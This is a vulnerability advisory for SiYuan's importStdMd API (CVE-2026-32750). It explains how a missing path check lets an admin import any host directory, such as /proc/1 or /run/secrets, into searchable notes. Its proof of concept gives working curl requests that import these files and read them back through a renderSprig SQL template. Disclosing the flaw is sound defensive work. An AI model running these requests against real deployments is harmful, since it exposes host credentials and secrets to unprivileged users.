PT-2026-25825 · Go · Github.Com/Siyuan-Note/Siyuan

Published

2026-03-16

·

Updated

2026-03-16

·

CVE-2026-32750

CVSS v3.1
6.8
VectorAV:N/AC:L/PR:H/UI:N/S:C/C:H/I:N/A:N

Summary

POST /api/import/importStdMd
passes the 
localPath
parameter directly to 
model.ImportFromLocalPath
with zero path validation. The function recursively reads every file under the given path and permanently stores their content as SiYuan note documents in the workspace database, making them searchable and accessible to all workspace users.

Details

File: 
kernel/api/import.go
- function 
importStdMd
func importStdMd(c *gin.Context) {
  notebook := arg["notebook"].(string)
  localPath := arg["localPath"].(string)  // no validation whatsoever
  toPath  := arg["toPath"].(string)

  err := model.ImportFromLocalPath(notebook, localPath, toPath)
  // ↑ calls filelock.Walk(localPath, ...) - reads entire directory tree
  // and writes every file's content into workspace SQLite as note blocks
}
model.ImportFromLocalPath
 (
kernel/model/import.go:784
):
func ImportFromLocalPath(boxID, localPath string, toPath string) (err error) {
  // ...
  filelock.Walk(localPath, func(currentPath string, d fs.DirEntry, ...) error {
    // reads file content → converts to .sy note → stores in database
  })
}
Unlike 
globalCopyFiles
, there is no blocklist at all. Any readable path is accepted. The imported content is permanently stored in the workspace SQLite database and survives restarts.
Chained attack with Bug #1 (renderSprig): Admin imports sensitive files → content stored in 
blocks
table → non-admin user queries via 
querySQL
through 
renderSprig
.

PoC

Environment:
docker run -d --name siyuan -p 6806:6806 
 -v $(pwd)/workspace:/siyuan/workspace 
 b3log/siyuan --workspace=/siyuan/workspace --accessAuthCode=test123
Exploit:
TOKEN="YOUR ADMIN TOKEN"

# Step 1: Create a notebook to import into
NOTEBOOK=$(curl -s -X POST http://localhost:6806/api/notebook/createNotebook 
 -H "Authorization: Token $TOKEN" -H "Content-Type: application/json" 
 -d '{"name":"Exfil"}' | python3 -c "import sys,json; print(json.load(sys.stdin)['data']['notebook']['id'])")

# Step 2: Import /proc/1/ - stores cmdline, environ, maps as notes
curl -s -X POST http://localhost:6806/api/import/importStdMd 
 -H "Authorization: Token $TOKEN" 
 -H "Content-Type: application/json" 
 -d "{"notebook":"$NOTEBOOK","localPath":"/proc/1","toPath":"/"}"

# Step 3: Import Docker secrets (if present)
curl -s -X POST http://localhost:6806/api/import/importStdMd 
 -H "Authorization: Token $TOKEN" 
 -H "Content-Type: application/json" 
 -d "{"notebook":"$NOTEBOOK","localPath":"/run/secrets","toPath":"/"}"

# Step 4: Any authenticated user (non-admin) queries the imported secrets
curl -s -X POST http://localhost:6806/api/template/renderSprig 
 -H "Authorization: Token $TOKEN" 
 -H "Content-Type: application/json" 
 -d '{"template":"{{range $r := (querySQL "SELECT content FROM blocks LIMIT 50")}}{{$r.content}}
---
{{end}}"}'

Impact

An admin can permanently import the contents of any readable host directory into the workspace as searchable notes. Unlike 
globalCopyFiles
, there is no blocklist - 
/proc/
, 
/etc/
, 
/run/secrets/
, 
/home/
are all accepted.
Data persists in the workspace database across restarts and is accessible to Publish Service Reader accounts. Combined with the 
renderSprig
SQL injection (separate advisory), a non-admin user can then read all imported secrets without any additional privileges.

Fix

Files Accessible to External Parties

Path traversal

Weakness Enumeration

CWE-552CWE-22

Related Identifiers

CVE-2026-32750
GHSA-RJHH-M223-9QQV

Affected Products

Github.Com/Siyuan-Note/Siyuan